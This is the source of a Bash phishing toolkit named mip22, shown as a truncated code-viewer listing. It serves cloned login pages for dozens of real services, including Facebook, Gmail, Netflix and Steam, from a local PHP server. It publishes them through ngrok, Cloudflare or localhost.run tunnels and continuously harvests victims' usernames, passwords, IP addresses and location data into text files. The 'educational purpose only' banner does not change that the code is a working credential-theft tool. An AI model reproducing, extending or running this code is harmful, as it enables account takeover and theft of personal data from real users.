mip22.sh 32 KB

12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273747576777879808182838485868788899091929394959697989910010110210310410510610710810911011111211311411511611711811912012112212312412512612712812913013113213313413513613713813914014114214314414514614714814915015115215315415515615715815916016116216316416516616716816917017117217317417517617717817918018118218318418518618718818919019119219319419519619719819920020120220320420520620720820921021121221321421521621721821922022122222322422522622722822923023123223323423523623723823924024124224324424524624724824925025125225325425525625725825926026126226326426526626726826927027127227327427527627727827928028128228328428528628728828929029129229329429529629729829930030130230330430530630730830931031131231331431531631731831932032132232332432532632732832933033133233333433533633733833934034134234334434534634734834935035135235335435535635735835936036136236336436536636736836937037137237337437537637737837938038138238338438538638738838939039139239339439539639739839940040140240340440540640740840941041141241341441541641741841942042142242342442542642742842943043143243343443543643743843944044144244344444544644744844945045145245345445545645745845946046146246346446546646746846947047147247347447547647747847948048148248348448548648748848949049149249349449549649749849950050150250350450550650750850951051151251351451551651751851952052152252352452552652752852953053153253353453553653753853954054154254354454554654754854955055155255355455555655755855956056156256356456556656756856957057157257357457557657757857958058158258358458558658758858959059159259359459559659759859960060160260360460560660760860961061161261361461561661761861962062162262362462562662762862963063163263363463563663763863964064164264364464564664764864965065165265365465565665765865966066166266366466566666766866967067167267367467567667767867968068168268368468568668768868969069169269369469569669769869970070170270370470570670770870971071171271371471571671771871972072172272372472572672772872973073173273373473573673773873974074174274374474574674774874975075175275375475575675775875976076176276376476576676776876977077177277377477577677777877978078178278378478578678778878979079179279379479579679779879980080180280380480580680780880981081181281381481581681781881982082182282382482582682782882983083183283383483583683783883984084184284384484584684784884985085185285385485585685785885986086186286386486586686786886987087187287387487587687787887988088188288388488588688788888989089189289389489589689789889990090190290390490590690790890991091191291391491591691791891992092192292392492592692792892993093193293393493593693793893994094194294394494594694794894995095195295395495595695795895996096196296396496596696796896997097197297397497597697797897998098198298398498598698798898999099199299399499599699799899910001001100210031004100510061007100810091010101110121013101410151016101710181019102010211022102310241025102610271028102910301031103210331034103510361037103810391040104110421043104410451046104710481049105010511052105310541055105610571058105910601061106210631064106510661067106810691070107110721073107410751076107710781079108010811082108310841085108610871088108910901091109210931094109510961097109810991100110111021103110411051106110711081109111011111112111311141115111611171118111911201121112211231124112511261127112811291130113111321133113411351136113711381139114011411142114311441145114611471148114911501151115211531154115511561157115811591160116111621163116411651166116711681169117011711172117311741175117611771178117911801181118211831184118511861187118811891190119111921193119411951196119711981199120012011202120312041205120612071208120912101211121212131214121512161217121812191220122112221223122412251226122712281229123012311232123312341235123612371238123912401241124212431244124512461247124812491250125112521253125412551256125712581259126012611262126312641265126612671268126912701271127212731274127512761277127812791280128112821283128412851286128712881289129012911292129312941295129612971298129913001301130213031304130513061307130813091310131113121313131413151316131713181319132013211322132313241325132613271328
  1. #!/bin/bash
  2. #
  3. # Copyright (c) 2022 Barchampas Gerasimos <makindosxx@gmail.com>.
  4. # mip22 is a advanced phishing tool.
  5. #
  6. # mip22 is free software: you can redistribute it and/or modify
  7. # it under the terms of the GNU Affero General Public License as published by
  8. # the Free Software Foundation, either version 3 of the License, or
  9. # (at your option) any later version.
  10. #
  11. # mip22 is distributed in the hope that it will be useful,
  12. # but WITHOUT ANY WARRANTY; without even the implied warranty of
  13. # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
  14. # GNU Affero General Public License for more details.
  15. #
  16. # You should have received a copy of the GNU Affero General Public License
  17. # along with this program. If not, see <http://www.gnu.org/licenses/>.
  18. #
  19. #
  20. #permissions
  21. chmod -R 777 packages.sh
  22. chmod -R 777 tunnels.sh
  23. chmod -R 777 data.txt
  24. chmod -R 777 fingerprints.txt
  25. chmod -R 777 .host
  26. chmod -R 777 .manual_attack
  27. chmod -R 777 .music
  28. chmod -R 777 .pages
  29. chmod -R 777 .tunnels_log
  30. chmod -R 777 .www
  31. #Install packages and tunnels
  32. check_os_and_install_packages() {
  33. if [[ -f .host/ngrok && -f .host/cloudflared ]]; then
  34. { clear; }
  35. else
  36. { clear; header; }
  37. OS_SYSTEM=$(uname -o)
  38. if [ $OS_SYSTEM != Android ]; then
  39. bash packages.sh
  40. bash tunnels.sh
  41. else
  42. ./packages.sh
  43. ./tunnels.sh
  44. fi
  45. fi
  46. }
  47. # Check os for root
  48. check_root_and_os() {
  49. OS_SYSTEM=$(uname -o)
  50. if [ $OS_SYSTEM != Android ]; then
  51. if [[ "${EUID:-$(id -u)}" -ne 0 ]]; then
  52. { clear; header; }
  53. echo -e "The program cannot run.\nFor run program in GNU/Linux Operating System,\nGive root privileges and try again. \n"
  54. exit 1
  55. fi
  56. fi
  57. }
  58. # Terminal Colors
  59. RED="$(printf '\033[31m')"
  60. GREEN="$(printf '\033[32m')"
  61. ORANGE="$(printf '\033[33m')"
  62. BLUE="$(printf '\033[34m')"
  63. MAGENTA="$(printf '\033[35m')"
  64. CYAN="$(printf '\033[36m')"
  65. WHITE="$(printf '\033[37m')"
  66. BLACK="$(printf '\033[30m')"
  67. # Directories
  68. if [[ ! -d ".host" ]]; then
  69. mkdir -p ".host"
  70. fi
  71. if [[ ! -d ".www" ]]; then
  72. mkdir -p ".www"
  73. fi
  74. # Clear content of log files
  75. truncate -s 0 .tunnels_log/.cloudfl.log
  76. truncate -s 0 .tunnels_log/.localrun.log
  77. pid_kill() {
  78. #kill all pid for php, ngrok and cloudflared
  79. if [[ `pidof php` ]]; then
  80. killall php > /dev/null 2>&1
  81. fi
  82. if [[ `pidof ngrok` ]]; then
  83. killall ngrok > /dev/null 2>&1
  84. fi
  85. if [[ `pidof cloudflared` ]]; then
  86. killall cloudflared > /dev/null 2>&1
  87. fi
  88. }
  89. header(){
  90. figlet "Mip22" | lolcat
  91. printf "${MAGENTA}"
  92. figlet "Missions Impossibles"
  93. cat <<- EOF
  94. ${CYAN}Mip tool made for educational purpose only. ${ORANGE}Version: 1.0
  95. ${CYAN}The author is not responsible for any malicious use of the program.
  96. ${CYAN} Mip Created by ${ORANGE}makdosx ${CYAN}(https://github.com/makdosx) ${WHITE}
  97. EOF
  98. }
  99. # Php webserver and port
  100. host='127.0.0.1'
  101. port='8080'
  102. setup_clone(){
  103. # Setup cloned page and server
  104. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${BLUE} Setting up cloned page..."${WHITE}
  105. rm -rf .www/*
  106. cp -rf .pages/"$site"/* .www
  107. echo -ne "\n${GREEN}[${WHITE}-${GREEN}]${BLUE} Starting your php server..."${WHITE}
  108. cd .www && php -S "$host":"$port" > /dev/null 2>&1 &
  109. }
  110. setup_clone_manual() {
  111. rm -rf .www/*
  112. cp -rf .manual_attack/index.html .www
  113. cp -rf .manual_attack/post.php .www
  114. cp -rf .manual_attack/data.txt .www
  115. cp -rf .manual_attack/__ROOT__/index.php .www
  116. cp -rf .manual_attack/__ROOT__/fingerprints.php .www
  117. rm -rf .manual_attack/index.html
  118. rm -rf .manual_attack/post.php
  119. rm -rf .manual_attack/data.txt
  120. echo -ne "\n${GREEN}[${WHITE}-${GREEN}]${BLUE} Starting your php server..."${WHITE}
  121. cd .www && php -S "$host":"$port" > /dev/null 2>&1 &
  122. }
  123. ## Get IP address
  124. get_fingerprints() {
  125. IP=$(grep -a 'IP:.*' .www/fingerprints.txt | cut -d " " -f2 | tr -d '\r')
  126. Full_Date=$(grep -a 'Full-Date:.*' .www/fingerprints.txt | cut -d " " -f2 | tr -d '\r')
  127. Country=$(grep -a 'Country:.*' .www/fingerprints.txt | cut -d " " -f2 | tr -d '\r')
  128. Region=$(grep -a 'Region:.*' .www/fingerprints.txt | cut -d " " -f2 | tr -d '\r')
  129. City=$(grep -a 'City:.*' .www/fingerprints.txt | cut -d " " -f2 | tr -d '\r')
  130. User_Agent=$(grep -a 'User-Agent:.*' .www/fingerprints.txt | cut -d " " -f2 | tr -d '\r')
  131. OS_System=$(grep -a 'OS-System:.*' .www/fingerprints.txt | cut -d " " -f2 | tr -d '\r')
  132. IFS=$'\n'
  133. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Victim Fingerprints.. "
  134. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} IP: ${BLUE}$IP"
  135. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Full Date: ${BLUE}$Full_Date"
  136. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Country: ${BLUE}$Country"
  137. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Region: ${BLUE}$Region"
  138. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} City: ${BLUE}$City"
  139. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} User-Agent: ${BLUE}$User_Agent"
  140. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} OS System: ${BLUE}$OS_System"
  141. echo -ne "\n${GREEN}[${WHITE}-${GREEN}]${BLUE} Saved in : ${MAGENTA}fingerprints.txt"
  142. cat .www/fingerprints.txt >> fingerprints.txt
  143. }
  144. # Get credentials from victims
  145. get_creds() {
  146. ACC=$(grep -o 'Username:.*' .www/data.txt | cut -d " " -f2)
  147. PASS=$(grep -o 'Password:.*' .www/data.txt | cut -d ":" -f2)
  148. IFS=$'\n'
  149. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Account : ${WHITE}$ACC"
  150. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Password : ${WHITE}$PASS"
  151. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Saved in : ${ORANGE}data.txt"
  152. cat .www/data.txt >> data.txt
  153. echo -ne "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Waiting for Next Fingerptints and Login Info, ${BLUE}Ctrl + C ${ORANGE}to exit. "
  154. }
  155. # Get credentials from victims manual method
  156. get_creds_manual() {
  157. ACC=$(tail -n 20 .www/data.txt)
  158. IFS=$'\n'
  159. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Account : ${WHITE}$ACC"
  160. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Saved in : ${ORANGE}data.txt"
  161. cat .www/data.txt >> data.txt
  162. echo -ne "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Waiting for Next Login Info, ${BLUE}Ctrl + C ${ORANGE}to exit. "
  163. }
  164. # Print credentials from victim
  165. credentials() {
  166. echo -ne "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Waiting for Victim fingerprints and Login Info.. ${BLUE}Ctrl + C ${MAGENTA}to exit..."
  167. while true; do
  168. if [[ -e ".www/fingerprints.txt" ]]; then
  169. echo -e "\n\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Fingerprints Victim Found!"
  170. get_fingerprints
  171. rm -rf .www/fingerprints.txt
  172. fi
  173. sleep 0.75
  174. if [[ -e ".www/data.txt" ]]; then
  175. echo -e "\n\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Login info Found !"
  176. get_creds
  177. rm -rf .www/data.txt
  178. fi
  179. sleep 0.75
  180. done
  181. }
  182. # Print credentials from victim manual
  183. credentials_manual() {
  184. while true; do
  185. if [[ -e ".www/fingerprints.txt" ]]; then
  186. echo -e "\n\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Fingerprints Victim Found!"
  187. get_fingerprints
  188. rm -rf .www/fingerprints.txt
  189. fi
  190. sleep 0.75
  191. if [[ -e ".www/data.txt" ]]; then
  192. echo -e "\n\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Login info Found !"
  193. get_creds_manual
  194. rm -rf .www/data.txt
  195. fi
  196. sleep 0.75
  197. done
  198. }
  199. # Localhost Start
  200. localhost_start() {
  201. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Initializing... ${GREEN}( ${CYAN}http://$host:$port ${GREEN})"
  202. setup_clone
  203. { sleep 1; clear; header; }
  204. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Successfully Hosted in : ${GREEN}${CYAN}http://$host:$port ${GREEN}"
  205. credentials
  206. }
  207. # Localhost Start
  208. localhost_start_manual() {
  209. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Initializing... ${GREEN}( ${CYAN}http://$host:$port ${GREEN})"
  210. setup_clone_manual
  211. { sleep 1; clear; header; }
  212. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Successfully Hosted in : ${GREEN}${CYAN}http://$host:$port ${GREEN}"
  213. credentials_manual
  214. }
  215. #ngrok token setup
  216. ngrok_setup_token() {
  217. { clear; header; echo; }
  218. cat <<- EOF
  219. ${GREEN}[${WHITE}1${GREEN}]${CYAN} Ngrok Toekn
  220. ${GREEN}[${WHITE}99${GREEN}]${CYAN} Main Menu
  221. EOF
  222. read -p "${GREEN}[${WHITE}-${GREEN}]${GREEN} Select Api : ${WHITE}"${WHITE}
  223. case $REPLY in
  224. 1)
  225. echo "Please insert yout ngrok authtoken (only key):"
  226. read authtoken
  227. if [[ `command -v termux-chroot` ]]; then
  228. termux-chroot ./.host/ngrok authtoken $authtoken
  229. sleep 2 && menu
  230. else
  231. ./.host/ngrok authtoken $authtoken
  232. sleep 2 && menu
  233. fi ;;
  234. 99) menu;;
  235. *)
  236. echo -ne "\n${RED}[${WHITE}!${RED}]${RED} Invalid Option, Try Again..."
  237. { sleep 0.7; ngrok_setup_token;};;
  238. esac
  239. }
  240. apis() {
  241. { clear; header; echo; }
  242. cat <<- EOF
  243. ${GREEN}[${WHITE}1${GREEN}]${CYAN} Ngrok
  244. ${GREEN}[${WHITE}99${GREEN}]${CYAN} Main Menu
  245. EOF
  246. read -p "${GREEN}[${WHITE}-${GREEN}]${GREEN} Select Api : ${WHITE}"${WHITE}
  247. case $REPLY in
  248. 1) ngrok_setup_token;;
  249. 99) menu;;
  250. *)
  251. echo -ne "\n${RED}[${WHITE}!${RED}]${RED} Invalid Api, Try Again..."
  252. { sleep 0.7; apis;};;
  253. esac
  254. }
  255. # Start ngrok
  256. ngrok_start() {
  257. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Initializing... ${MAGENTA}( ${CYAN}http://$host:$port ${MAGENTA})"
  258. { sleep 1; setup_clone; }
  259. echo -ne "\n\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Launching Ngrok..."
  260. if [[ `command -v termux-chroot` ]]; then
  261. sleep 2 && termux-chroot ./.host/ngrok http "$host":"$port" > /dev/null 2>&1 &
  262. else
  263. sleep 2 && ./.host/ngrok http "$host":"$port" > /dev/null 2>&1 &
  264. fi
  265. { sleep 9; clear; header; }
  266. ngrok_url=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[-0-9a-z]*\.ngrok.io")
  267. ngrok_url1=${ngrok_url#https://}
  268. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${WHITE} URL http : ${GREEN}http://$ngrok_url1"
  269. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${WHITE} URL http(s) : ${GREEN}$ngrok_url"
  270. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${WHITE} URL subdomain : ${GREEN}$subdomain@$ngrok_url1"
  271. credentials
  272. }
  273. # Start ngrok
  274. ngrok_start_manual() {
  275. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Initializing... ${MAGENTA}( ${CYAN}http://$host:$port ${MAGENTA})"
  276. { sleep 1; setup_clone_manual; }
  277. echo -ne "\n\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Launching Ngrok..."
  278. if [[ `command -v termux-chroot` ]]; then
  279. sleep 2 && termux-chroot ./.host/ngrok http "$host":"$port" > /dev/null 2>&1 &
  280. else
  281. sleep 2 && ./.host/ngrok http "$host":"$port" > /dev/null 2>&1 &
  282. fi
  283. { sleep 9; clear; header; }
  284. ngrok_url=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[-0-9a-z]*\.ngrok.io")
  285. ngrok_url1=${ngrok_url#https://}
  286. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${WHITE} URL http : ${GREEN}http://$ngrok_url1"
  287. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${WHITE} URL http(s) : ${GREEN}$ngrok_url"
  288. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${WHITE} URL subdomain : ${GREEN}$subdomain@$ngrok_url1"
  289. credentials_manual
  290. }
  291. # Start Cloudflared
  292. #
  293. cloudflared_start() {
  294. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Initializing... ${MAGENTA}( ${CYAN}http://$host:$port ${GREEN})"
  295. { sleep 1; setup_clone; }
  296. echo -ne "\n\n${GREEN}[${WHITE}-${GREEN}]${MAGETNA} Launching Cloudflared..."
  297. if [[ `command -v termux-chroot` ]]; then
  298. sleep 2 && termux-chroot ./.host/cloudflared tunnel -url "$host":"$port" > .tunnels_log/.cloudfl.log 2>&1 & > /dev/null 2>&1 &
  299. else
  300. sleep 2 && ./.host/cloudflared tunnel -url "$host":"$port" > .tunnels_log/.cloudfl.log 2>&1 & > /dev/null 2>&1 &
  301. fi
  302. { sleep 9; clear; header; }
  303. cldflr_url=$(grep -o 'https://[-0-9a-z]*\.trycloudflare.com' ".tunnels_log/.cloudfl.log")
  304. cldflr_url1=${cldflr_url#https://}
  305. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${WHITE} URL http : ${GREEN}http://$cldflr_url1"
  306. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${WHITE} URL http(s) : ${GREEN}$cldflr_url"
  307. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${WHITE} URL subdomain : ${GREEN}$subdomain@$cldflr_url1"
  308. credentials
  309. }
  310. # Start Cloudflared
  311. #
  312. cloudflared_start_manual() {
  313. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Initializing... ${MAGENTA}( ${CYAN}http://$host:$port ${GREEN})"
  314. { sleep 1; setup_clone_manual; }
  315. echo -ne "\n\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Launching Cloudflared..."
  316. if [[ `command -v termux-chroot` ]]; then
  317. sleep 2 && termux-chroot ./.host/cloudflared tunnel -url "$host":"$port" > .tunnels_log/.cloudfl.log 2>&1 & > /dev/null 2>&1 &
  318. else
  319. sleep 2 && ./.host/cloudflared tunnel -url "$host":"$port" > .tunnels_log/.cloudfl.log 2>&1 & > /dev/null 2>&1 &
  320. fi
  321. { sleep 9; clear; header; }
  322. cldflr_url=$(grep -o 'https://[-0-9a-z]*\.trycloudflare.com' ".tunnels_log/.cloudfl.log")
  323. cldflr_url1=${cldflr_url#https://}
  324. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${WHITE} URL http : ${GREEN}http://$cldflr_url1"
  325. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${WHITE} URL http(s) : ${GREEN}$cldflr_url"
  326. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${WHITE} URL subdomain : ${GREEN}$subdomain@$cldflr_url1"
  327. credentials_manual
  328. }
  329. # Start localrun
  330. localhostrun_start() {
  331. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Initializing... ${MAGENTA}( ${CYAN}http://$host:$port ${MAGENTA})"
  332. { sleep 1; setup_clone; }
  333. echo -ne "\n\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Launching LocalhostRun..."
  334. if [[ `command -v termux-chroot` ]]; then
  335. sleep 2 && termux-chroot ssh -R "80":"$host":"$port" "nokey@localhost.run" > .tunnels_log/.localrun.log 2>&1 & > /dev/null 2>&1 &
  336. else
  337. sleep 2 && ssh -R "80":"$host":"$port" "nokey@localhost.run" > .tunnels_log/.localrun.log 2>&1 & > /dev/null 2>&1 &
  338. fi
  339. { sleep 9; clear; header; }
  340. localrun_url=$(grep -o 'https://[-0-9a-z]*\.lhrtunnel.link' ".tunnels_log/.localrun.log")
  341. localrun_url1=${localrun_url#https://}
  342. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${WHITE} URL http : ${GREEN}http://$localrun_url1"
  343. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${WHITE} URL https(s) : ${GREEN}$localrun_url"
  344. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${WHITE} URL subdomain : ${GREEN}$subdomain@$localrun_url1"
  345. credentials
  346. }
  347. # Start localrun
  348. localhostrun_start_manual() {
  349. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Initializing... ${MAGENTA}( ${CYAN}http://$host:$port ${MAGENTA})"
  350. { sleep 1; setup_clone_manual; }
  351. echo -ne "\n\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Launching LocalhostRun..."
  352. if [[ `command -v termux-chroot` ]]; then
  353. sleep 2 && termux-chroot ssh -R "80":"$host":"$port" "nokey@localhost.run" > .tunnels_log/.localrun.log 2>&1 & > /dev/null 2>&1 &
  354. else
  355. sleep 2 && ssh -R "80":"$host":"$port" "nokey@localhost.run" > .tunnels_log/.localrun.log 2>&1 & > /dev/null 2>&1 &
  356. fi
  357. { sleep 9; clear; header; }
  358. localrun_url=$(grep -o 'https://[-0-9a-z]*\.lhrtunnel.link' ".tunnels_log/.localrun.log")
  359. localrun_url1=${localrun_url#https://}
  360. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${WHITE} URL http : ${GREEN}http://$localrun_url1"
  361. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${WHITE} URL https(s) : ${GREEN}$localrun_url"
  362. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${WHITE} URL subdomain : ${GREEN}$subdomain@$localrun_url1"
  363. credentials_manual
  364. }
  365. # Select Tunnel
  366. tunnel() {
  367. { clear; header; }
  368. cat <<- EOF
  369. ${GREEN}[${WHITE}1${GREEN}]${CYAN} Localhost ${MAGENTA} (for practise only)
  370. ${GREEN}[${WHITE}2${GREEN}]${CYAN} LocalhostRun ${MAGENTA} (alternative)
  371. ${GREEN}[${WHITE}3${GREEN}]${CYAN} Cloudflared ${MAGENTA} (recommended)
  372. ${GREEN}[${WHITE}4${GREEN}]${CYAN} Ngrok ${MAGENTA} (first install token from menu)
  373. EOF
  374. read -p "${GREEN}[${WHITE}-${GREEN}]${GREEN} Select a port forwarding service : ${WHITE}"
  375. case $REPLY in
  376. 1)
  377. localhost_start;;
  378. 2)
  379. localhostrun_start;;
  380. 3)
  381. cloudflared_start;;
  382. 4)
  383. ngrok_start;;
  384. *)
  385. echo -ne "\n${GREEN}[${WHITE}!${GREEN}]${RED} Invalid Option, Try Again..."
  386. { sleep 1; header; tunnel;};;
  387. esac
  388. }
  389. start_manual_method() {
  390. cd .manual_attack && php -S "127.0.0.1:8081" > /dev/null 2>&1 &
  391. echo -e "\n${GREEN}[${WHITE}-${GREEN}] ${GREEN} Visit ${WHITE} http://127.0.0.1:8081 ${GREEN} for setup clone page "${WHITE}
  392. echo -e "\n${GREEN}[${WHITE}-${GREEN}] ${GREEN} After setup clone page return to here and continue... "${WHITE}
  393. }
  394. # Select Tunnel
  395. tunnel_manual() {
  396. { clear; header; }
  397. start_manual_method
  398. cat <<- EOF
  399. ${GREEN}[${WHITE}1${GREEN}]${CYAN} Localhost ${MAGENTA} (for practise only)
  400. ${GREEN}[${WHITE}2${GREEN}]${CYAN} LocalhostRun ${MAGENTA} (alternative)
  401. ${GREEN}[${WHITE}3${GREEN}]${CYAN} Cloudflared ${MAGENTA} (recommended)
  402. ${GREEN}[${WHITE}4${GREEN}]${CYAN} Ngrok ${MAGENTA} (first install token from menu)
  403. EOF
  404. read -p "${GREEN}[${WHITE}-${GREEN}]${GREEN} Select a port forwarding service : ${WHITE}"
  405. case $REPLY in
  406. 1)
  407. localhost_start_manual;;
  408. 2)
  409. localhostrun_start_manual;;
  410. 3)
  411. cloudflared_start_manual;;
  412. 4)
  413. ngrok_start_manual;;
  414. *)
  415. echo -ne "\n${GREEN}[${WHITE}!${GREEN}]${RED} Invalid Option, Try Again..."
  416. { sleep 1; header; tunnel;};;
  417. esac
  418. }
  419. vpn_setup() {
  420. { clear; header; echo; }
  421. cat <<- EOF
  422. ${GREEN}[${WHITE}1${GREEN}]${CYAN} Psiphon Vpn
  423. ${GREEN}[${WHITE}99${GREEN}]${CYAN} Main Menu
  424. EOF
  425. read -p "${GREEN}[${WHITE}-${GREEN}]${GREEN} Select Api : ${WHITE}"${WHITE}
  426. case $REPLY in
  427. 1)
  428. if [[ `command -v termux-chroot` ]]; then
  429. echo "https://play.google.com/store/apps/details?id=com.psiphon3.subscription"
  430. sleep 4 && menu
  431. else
  432. echo "https://play.google.com/store/apps/details?id=com.psiphon3.subscription"
  433. #echo 'Not Supported. Setup your vpn manual'
  434. sleep 4 && menu
  435. fi ;;
  436. 99) menu;;
  437. *)
  438. echo -ne "\n${RED}[${WHITE}!${RED}]${RED} Invalid Option, Try Again..."
  439. { sleep 0.7; ngrok_setup_token;};;
  440. esac
  441. }
  442. play_music() {
  443. { clear; header; }
  444. cat <<- EOF
  445. ${GREEN}[${WHITE}1${GREEN}]${CYAN} Play Music
  446. ${GREEN}[${WHITE}2${GREEN}]${CYAN} Stop Music
  447. ${GREEN}[${WHITE}99${GREEN}]${CYAN} Main Menu
  448. ${MAGENTA} If you select this option which is the background music then you may
  449. ${MAGENTA} not see the attacker's details directly in the terminal.
  450. ${MAGENTA} If you not seen the data pause the music and restart the program again.
  451. ${MAGENTA} However, they have been saved in the data txt file.
  452. EOF
  453. read -p "${GREEN}[${WHITE}-${GREEN}]${GREEN} Select Option : ${WHITE}"${WHITE}
  454. case $REPLY in
  455. 1)
  456. xterm -e nohup mpv .music/mis_song.mp3 > /dev/null 2>&1
  457. menu;;
  458. 2)
  459. pidof mpv && killall mpv > /dev/null 2>&1
  460. menu;;
  461. 99)
  462. menu;;
  463. *)
  464. echo -ne "\n${RED}[${WHITE}!${RED}]${RED} Invalid Option, Try Again...";;
  465. esac
  466. }
  467. attack() {
  468. { clear; header; echo; }
  469. cat <<- EOF
  470. ${GREEN}[${WHITE}1${GREEN}]${CYAN} Adobe ${GREEN}[${WHITE}25${GREEN}]${CYAN} Line ${GREEN}[${WHITE}48${GREEN}]${CYAN} Socialclub
  471. ${GREEN}[${WHITE}2${GREEN}]${CYAN} Amazon ${GREEN}[${WHITE}26${GREEN}]${CYAN} LinkedIn ${GREEN}[${WHITE}49${GREEN}]${CYAN} Spotify
  472. ${GREEN}[${WHITE}3${GREEN}]${CYAN} Apple ${GREEN}[${WHITE}27${GREEN}]${CYAN} Livejournal ${GREEN}[${WHITE}50${GREEN}]${CYAN} Stackoverflow
  473. ${GREEN}[${WHITE}4${GREEN}]${CYAN} Baddo ${GREEN}[${WHITE}28${GREEN}]${CYAN} Mediafire ${GREEN}[${WHITE}51${GREEN}]${CYAN} Steam
  474. ${GREEN}[${WHITE}5${GREEN}]${CYAN} Care2 ${GREEN}[${WHITE}29${GREEN}]${CYAN} MeWe ${GREEN}[${WHITE}52${GREEN}]${CYAN} Tagged
  475. ${GREEN}[${WHITE}6${GREEN}]${CYAN} Clashofclans ${GREEN}[${WHITE}30${GREEN}]${CYAN} Microsoft ${GREEN}[${WHITE}53${GREEN}]${CYAN} Telegram
  476. ${GREEN}[${WHITE}7${GREEN}]${CYAN} Crunchyroll ${GREEN}[${WHITE}31${GREEN}]${CYAN} Mocospace ${GREEN}[${WHITE}54${GREEN}]${CYAN} Tiktok
  477. ${GREEN}[${WHITE}8${GREEN}]${CYAN} Deviantart ${GREEN}[${WHITE}32${GREEN}]${CYAN} Myspace ${GREEN}[${WHITE}55${GREEN}]${CYAN} Tiktok Followers
  478. ${GREEN}[${WHITE}9${GREEN}]${CYAN} Discord ${GREEN}[${WHITE}33${GREEN}]${CYAN} Netflix ${GREEN}[${WHITE}56${GREEN}]${CYAN} Tumblr
  479. ${GREEN}[${WHITE}10${GREEN}]${CYAN} Dota2 ${GREEN}[${WHITE}34${GREEN}]${CYAN} Origin ${GREEN}[${WHITE}57${GREEN}]${CYAN} Twitch
  480. ${GREEN}[${WHITE}11${GREEN}]${CYAN} Dropbox ${GREEN}[${WHITE}35${GREEN}]${CYAN} Outlook ${GREEN}[${WHITE}58${GREEN}]${CYAN} Twitter
  481. ${GREEN}[${WHITE}12${GREEN}]${CYAN} Ebay ${GREEN}[${WHITE}36${GREEN}]${CYAN} Pinterest ${GREEN}[${WHITE}59${GREEN}]${CYAN} Viber Out
  482. ${GREEN}[${WHITE}13${GREEN}]${CYAN} Facebook ${GREEN}[${WHITE}37${GREEN}]${CYAN} Playstation ${GREEN}[${WHITE}60${GREEN}]${CYAN} Vimeo
  483. ${GREEN}[${WHITE}14${GREEN}]${CYAN} Facebook Messenger ${GREEN}[${WHITE}38${GREEN}]${CYAN} Protonmail ${GREEN}[${WHITE}61${GREEN}]${CYAN} Vk
  484. ${GREEN}[${WHITE}15${GREEN}]${CYAN} Facebook Security ${GREEN}[${WHITE}49${GREEN}]${CYAN} Pubg ${GREEN}[${WHITE}62${GREEN}]${CYAN} Whatsapp
  485. ${GREEN}[${WHITE}16${GREEN}]${CYAN} Gmail ${GREEN}[${WHITE}40${GREEN}]${CYAN} Quora ${GREEN}[${WHITE}63${GREEN}]${CYAN} Wordpress
  486. ${GREEN}[${WHITE}17${GREEN}]${CYAN} Goodreads ${GREEN}[${WHITE}41${GREEN}]${CYAN} Reverly ${GREEN}[${WHITE}64${GREEN}]${CYAN} Xanga
  487. ${GREEN}[${WHITE}18${GREEN}]${CYAN} Hotstar ${GREEN}[${WHITE}42${GREEN}]${CYAN} Reddit ${GREEN}[${WHITE}65${GREEN}]${CYAN} Xbox
